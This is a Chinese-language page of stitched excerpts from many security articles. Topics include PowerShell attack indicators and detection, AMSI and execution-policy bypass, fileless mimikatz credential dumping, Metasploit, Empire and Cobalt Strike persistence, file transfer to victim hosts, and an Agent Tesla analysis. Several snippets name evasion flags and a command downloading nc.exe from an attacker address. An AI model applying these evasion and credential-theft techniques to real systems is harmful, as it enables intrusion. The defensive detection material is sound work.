关于PS2EXE PS2EXE是一个可以将PowerShell脚本编译为可执行程序的模块,在GUI和Ingo Karstein脚本的支持下,该模块能够生成真正的Windows可执行程序。...除此之外,PS2EXE还支持PowerShell 5.x和图形化前端。...注意事项 有一些人可能会滥用PS2EXE来编译他的计算机病毒脚本,因此越来越多的病毒扫描程序会将使用PS2EXE创建的程序识别为恶意程序并将其删除。因此,希望大家不要将其用于恶意目的。...\target.exe”的话,生成的文件将为“.\source.exe”。...位或64位代码 lcid = 编译可执行程序的位置ID STA或MTA = 单线程模式或多线程模式 noConsole = 生成的可执行文件为Windows应用程序,不带终端窗口 UNICODEEncoding
下面给出的是一个简单的样例: 其中,cmd.js是一个远程脚本,它能够从目标设备的内存中远程调用calc.exe,整个过程不会在硬盘中留下任何痕迹。...(IoC)列表: –WindowStyle hidden / -w hidden: 隐藏程序的窗口 –Exec Bypass: 绕过类似Restricted之类的程序执行策略 –Command / -c...观察PowerShell父进程和子进程之间的关系 一般来说,当我们从开始菜单或磁盘目录中直接运行PowerShell的话,它会在explorer.exe进程下运行。...Windows的安全事件日志如何帮助我们检测PowerShell攻击 接下来,我们一起看看Windows的事件日志如何帮助我们识别上述介绍的IoC。...相关功能介绍以及启用方法可访问以下资料获取:[阅读原文] 事件ID 4688可以根据SIEM生成的警报信息来给我们提供三条关键信息,我们可以使用这两条信息来检测PowerShell攻击: 1.
本文将为大家详细介绍如何在只能访问远程桌面服务,且有 AppLocker 保护 PowerShell 处于语言约束模式下获取目标机器 Empire shell。....Net v3.5(用于PowerShdll中的dll模式) 注:powershell.exe不是Powershell。...它只托管包含PowerShell的程序集并处理I/O.System.Management.Automation.dll 有关更多信息,请阅读原文获取文末链接。...现在从不受限的PowerShell中,下载shell并将其直接执行到内存中。...最重要的是将Base64设置为false,防止stager调用powershell.exe。由于受限的语言模式,将导致powershell.exe无法在此处运行。
在渗透测试中,有三个非常经典的渗透测试框架--Metasploit、Empire、Cobalt Strike。 那么,通过漏洞获取到目标主机权限后,如何利用渗透框架获得持久性权限呢?...0x01 MSF权限维持 使用MSF维持权限的前提是先获得一个meterpreter shell,通过meterpreter shell获取持久性shell的方法有两种: Persistence模块...在任务计划程序库可以看到-任务为Updater-启动程序如下可以到为powershell ?...如何清除后门,最简单的方法就是使用Autoruns,选择WMI选项卡,右键就可以删除恶意后门。 ?...从Cobalt Strike菜单栏,Attacks--Web Drive-by--Scaripted Web Delivery,生成powershell后门。 ?
本文作者:掉到鱼缸里的猫(Ms08067内网安全小组成员) 文章来源|MS08067 内网安全知识星球 1.理论 学过徐老师《内网安全攻防:渗透测试实战指南》第五章的⼩伙伴都知道,巨硬为了防⽌密码在内存中以明...,需要在短时间内获取⽤⼾明⽂⼝令,⽤⼾没有登录⾏为,那么抓密码也就⽆从谈起。...如果要求交互式任务,则使用 schtasks.exe 实用程序(使用 "schtasks /?" 命令获取详细信 息)。 2.2MSF 1....直接利⽤meterpreter的shell功能,获取⼀个⽬标的交互式窗⼝,执⾏ rundll32.exe user32.dll,LockWorkStation 即可锁定当前⽤⼾。 2....]”,同时当前⽤⼾会弹出“程序⽆法正常启动”的错误。
我们将介绍如何将文件从攻击者计算机传输到受害者 Windows 10 主机(下载),以及如何从受害者 Windows 10 主机传输回攻击者计算机(上传)的各种技术。...作为黑客,我们经常发现我们需要向受害者投放工具,或者需要将我们的漏洞下载到内存中。无论哪种方式,我们都需要知道如何将这些工具或漏洞发送给受害者,更重要的是,我们需要知道实现这一目标的多种方法。...通过攻击者计算机上的共享,我们实际上可以直接从共享文件夹在受害者上执行文件。例如,我们可以使用共享中的 nc.exe 获取反向 shell,而无需将其复制到受害者。...并非所有这些二进制文件都可以与 evil-winrm 一起使用,因为它只允许 .Net 程序集(从 C# 编译的可执行文件)在内存中执行。...现在我们已经了解了如何将可执行文件从攻击者计算机直接加载到受害者的内存中,让我们看看如何加载 PS1 脚本,因为我们还使用了 -s开关。
PowerShell包含两个应用程序组件:基于文本的标准控制台(powershell.exe)和集成命令环境的图形化界面(ISE:powershell_ise.exe)。...不同操作系统内置的Powershell是不一样的,比如win7或win2008。 (2) 其次,如何查看版本呢?...常见的优点包括: Windows 7以上的操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell...举个例子来看管道是如何工作的,假设停止所有目前运行汇总以 “p” 字符开头命名的程序,命令如下: get-process p* | stop-process 管道并不是什么新事物,以前的Cmd控制台也有重定向的命令...压缩,Base-64编码,并输出生成的代码,以将受管理的DLL加载到内存中 Remove-Comments.ps1 从脚本中删除注释和多余的空白 Persistence(权限维持) New-UserPersistenceOption
该程序包生成一个HTML应用,该应用运行一个CobaltSt rikepayload。你可以选择可执行的选项来获取一个HTML应用,此HTML应用使得一个可执行文件落地在磁盘上并运行它。...使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意的宏来将payload注入到内存中。...也就是说,普通的EXE和服务器启动调用的EXE是有区别是。...利用Windows ServiceEXE生成的EXE才能用来作为服务自启动的EXE,利用Cobalt Strike中Windows exe生成的EXE不能作为服 务自启动的EXE程序(因为不能响应Service...在⽬标上内存中执⾏本地.NET程序 22. exit 终⽌beacon会话 23. getprivs Enable system privileges on current token 24. getsystem
团队免杀系列又有了远控免杀从入门到实践(6)-代码篇-Powershell更是拓宽了自己的认知。这里继续学习powershell在对抗Anti-Virus的骚姿势。...绕过执行策略 powershell 可以通过绕过执行策略来执行恶意程序。 而从文件是否落地可以简单分为落地的bypass、不落地的bypass。...分析CobaltStrike powershell command 这里使用CobaltStrike 4.1来生成payload ? 访问83端口的a文件,获取payload代码。...那同样可以从远程文件读取shellcode,并加载到内存执行,来实现payload无落地。...powershell转exe 在修改了加载器之后,我们还可以通过powershell代码将其加载器转换为exe程序。 借助Win-PS2EXE项目,通过ps2exe.ps1脚本将加载器转为exe文件。
【PowerShell 代码执行】 解密的代码以隐藏窗口的形式执行,解密后会获取另一个 PowerShell 代码。...【执行新的 PowerShell 代码】 IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码: 从远程服务器下载 Agent Tesla 的 Payload 执行...该脚本将 [ENTER] 按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。...如果 Payload 的扩展名为 .dll,则它使用 rundll32.exe 将 DLL 加载到虚拟内存中。...【通过解密的 PowerShell 代码下载并执行 Agent Tesla】 在某些情况下,还会有在内存中解密的 PowerShell 代码。
分析 嵌入的 lnk 文件被混淆,去混淆后我们可以看到它使用 cmd.exe 调用 PowerShell 从 Github 帐户(lib7.ps1)下载并执行攻击的第一阶段。...技术 2 — 使用 sysprep.exe 系统实用程序和 DLL 劫持加载: 首先,创建一个帮助程序脚本以重新启动目录 C:\Windows\Temp 中的 PowerShell 脚本。...然后使用 wusa.exe 系统实用程序将此存档解压缩到文件夹 C:\Windows\System32\Sysprep 中。...接下来,sysprep.exe 系统实用程序启动,加载先前解压的 DLL,然后 DLL 继续执行帮助脚本。然后PowerShell 脚本将以管理员权限重新启动,绕过 UAC。...最后,sysprep.exe 系统实用程序启动哪一侧加载 Windows 7 的 CRYPTBASE.dll 或 Windows 8 的 shcore.dll。
目标机system权限,安装了360,准备获取密码。 mimikatz的exe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀的死死的,扔上去就挂 ?...在win10运行,成功获取账号密码: ? 扔到Win7上试试,出现报错 ? 因为win7powershell版本为2.0 ?...既然可以远程加载powershell绕过杀软,那远程加载exe也同样可以,powershell加载exe进内存运行需要PowerSploit中的Invoke-ReflectivePEInjection脚本...我们远程加载Invoke-ReflectivePEInjection再远程加载调用mimikatz.exe进内存以无文件落地方式绕过杀软读取账号密码(绕过PowerShell下载攻击弹窗方式同上),命令如下..." -ForceASLR -PEUrl :包含要加载和执行的DLL / EXE的URL -ExeArgs :所要执行命令 ?
,因为 Windows 有一个可以与 WMI (wmic) 交互的实用程序,并且也可以利用 PowerShell。...mofcomp.exe ./Metasploit.mof 在这种情况下,payload 是通过 Metasploit “ web_delivery/ ”模块使用 regsvr32 方法远程获取的。...WMI-Persistence是另一个 PowerShell 脚本,它可以创建事件过滤器,在每次重新启动后 5 分钟内从远程位置执行基于 PowerShell 的有效负载。...默认情况下,此工具使用记事本,这是一个常见的 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exe、excel.exe、calc.exe,具体取决于从主机收集的信息在态势感知期间...“ wmi_updater ” 模块能够从远程位置获取有效负载,而不是将其存储在 WMI 存储库中。它将注册为“ AutoUpdater ”,并且可以在启动时或一天中的特定时间设置触发器。
根据上述过程,我们可以看出,最直接的获取Windows凭证方法,无非就是想办法从lsass.exe进程中或从sam数据库中获取。...Windows 凭证获取 使用powershell脚本 powershell脚本:[1] https://raw.githubusercontent.com/samratashok/nishang/master..., 主要用于桌面应用开发人员对应用的一些检测处理,我们使用Procdump实现的主要功能是将正在运行的程序生成静态文件 方便我们进行分析操作,我在上述介绍中提过,处理我们密码的程序是lsass.exe,...而这里我们也主要会将它进行静态的文件,.然后再将此文件从目标电脑中导出至本地。...特点 文件落地 mimikatz 功能强大 文件落地(可以内存加载) powershell 使用方便 内存加载 Pwddump7 和powershell脚本类似 内存加载 Procdump 微软官方工具
是开放的,因此任何AV都可以从其函数中读取数据,在这里正在运行一个Windows脚本,当它通过AMSI时,amsi.dll被注入到与我们程序相同的虚拟内存中,这个amsi.dll有各种可以评估代码的函数...,此处不会绕过实际有效负载 Microsoft已将AMSI集成在powershell终端(powershell.exe应用程序)中,该终端接收输入并通过Powershell引擎对其进行解析,如果我们打开进程黑客并搜索...,在某些方法中使用字节码,在其他方法中替换函数或替换字符串,但逻辑相同 Method 4: Powershell内存劫持 Daniel Duggan在他的博客中介绍了关于绕过AMSI的内存劫持技术,逻辑是...,将类型绑定到现有对象,或从现有对象获取类型并调用其方法或访问其字段和属性,如果您在代码中使用属性,反射使您能够访问它们 Paul Laine在此处的contextis.com博客上发布了原始的内存劫持方法...\nishang.ps1 Invoke-AmsiBypass -Verbose "invoke-mimikatz" 文末小结 在本文中我们讨论了AMSI的基础知识、如何在程序中使用它们、工作流程以及绕过它们的
这里我们可以利用进程注入的方式来绕过,首先加载powershell扩展,使用powershell_shell命令进入交互模式下执行powershell得到一个x64的conhost.exe进程来进行当前会话的进程迁移...因为在这种场景下当前权限运行的进程只有w3wp.exe,没有其它同权限进程用于进程迁移,所以只能利用powershell扩展得到个conhost.exe进程用于执行迁移。...如果遇到执行powershell但并没有conhost.exe进程的情况,可能是需要多执行几次才会有。...注意事项: 这种方式是将shellcode加载到w3wp.exe内存中运行,但非常容易造成IIS应用程序池崩溃,访问网站出现503报错,所以还请谨慎使用。...而且获取的会话经常会断开,不适合运行在w3wp.exe、conhost.exe,所以还是得在绕过D盾防火墙的【执行限制】后再单独运行一个Payload。
4、加载器分离免杀加载器就是利用了ShellCode和PE分离的方式来达到免杀的效果,在远控免杀专题中介绍过不少很好用的加载器,不过很多只能加载基于RAW格式或固定格式的shellcode,对exe程序就无能无力了...方法5-PowerShell嵌入EXE文件(VT查杀率15/58) 这个方法其实只是将exe程序转为字符串,然后嵌入到Invoke-ReflectivePEInjection.ps1中直接执行。...方法6-C程序中执行powershell(VT查杀率7/71) 这个执行方式也是比较简单,在C代码里执行powershell。...WDigest的问题是它将密码存储在内存中,并且无论是否使用它,都会将其存储在内存中。 默认在win2008之前是默认启用的。但是在win2008之后的系统上,默认是关闭的。...,mimiktaz抓不到明文;UseLogonCredential 值设置为 1, WDigest把凭证缓存在内存,mimiktaz可以获取到明文。
Powershell 可以作为一个应用程序在 cmd 中执行,cmd 也可以在 Powershell 中执行。 为什么 powershell 能够执行 cmd 命令?...|powershell.exe -NoP - -noprofile 简写 -NoP, 为不加载 windows poweshell 配置文件 你也可以从网络上下载脚本并执行,这样就不会写入磁盘和修改配置文件...5.PSConsole: 使用 PSConsole 指定 powershell 控制文件 powershell 脚本分析 几个较为常用的执行脚本的语句: 1、本地绕过执行策略执行脚本 PowerShell.exe...,它包含了 DownloadFile 方法远程下载文件,和 Download-String 方法下载数据到内存中的缓冲区,减少了数据落地内存留下痕迹的可能。...知攻焉知防,既然了解了 powershell 最基础的攻击方法,那么了解如何检测 powershell 攻击活动也是必不可少的:如何检测powershell攻击活动
0x01 PowerShell简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...代码运行在内存中可以不去接触磁盘 很多安全产品并不能监测到powershell的活动 cmd.exe通常被阻止运行,但是powershell不会。 ?...0x02 常用命令及一般攻击方式 -WindowsStyle Hidden 隐藏自己的窗口 -ExecutionPolicy Bypass 绕过策略 Get-Content .runme.ps1 | PowerShell.exe..."http://10.0.0.10/nc.exe" -outfile "nc.exe" 获取帮助 get-help 进程相关 start-process get-process stop-process
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
实时音视频
即时通信 IM
对象存储
